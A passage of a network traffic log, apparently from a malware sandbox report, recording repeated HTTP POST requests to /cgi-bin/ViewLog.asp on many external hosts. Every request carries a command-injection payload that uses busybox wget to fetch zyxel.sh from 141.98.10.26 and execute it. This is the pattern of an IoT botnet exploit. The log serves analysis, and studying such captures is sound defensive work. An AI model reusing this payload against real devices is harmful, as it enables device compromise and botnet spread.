Nov 22, 2023 08:38:22.095468998 CET	3888	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:24.527143002 CET	4160	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:29.134464979 CET	4731	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:38.093215942 CET	5801	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:57.290482998 CET	8189	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:34.149369001 CET	12636	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.23	55274	31.136.157.240	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.396692038 CET	3754	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:20.975739956 CET	3774	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:22.095473051 CET	3888	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:24.527137041 CET	4160	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:29.134444952 CET	4730	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:38.093214989 CET	5800	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:57.290519953 CET	8191	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:34.149368048 CET	12636	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.23	47484	94.121.24.48	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.484520912 CET	3759	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
150	192.168.2.23	55786	94.120.32.248	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.484658003 CET	3759	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
151	192.168.2.23	43158	94.122.208.195	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.491692066 CET	3761	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
152	192.168.2.23	50946	62.151.182.28	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.523853064 CET	3762	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
153	192.168.2.23	39854	31.136.197.57	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.667939901 CET	3766	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:21.231544018 CET	3786	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:22.351398945 CET	3905	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:24.787061930 CET	4174	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:29.390511990 CET	4765	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:38.349143028 CET	5868	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:57.290481091 CET	8188	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:34.149367094 CET	12635	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
154	192.168.2.23	60266	85.234.116.1	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.687860966 CET	3767	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
155	192.168.2.23	46464	94.122.198.56	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.704068899 CET	3768	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:21.839514971 CET	3824	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:23.183394909 CET	4006	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:26.062895060 CET	4297	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.438111067 CET	5067	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:42.188666105 CET	6238	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.433715105 CET	9027	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:46.435672045 CET	14122	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
156	192.168.2.23	45074	94.120.103.241	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:20.712376118 CET	3769	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
157	192.168.2.23	37498	95.215.173.61	8080

Timestamp	kBytes transferred	Direction	Data
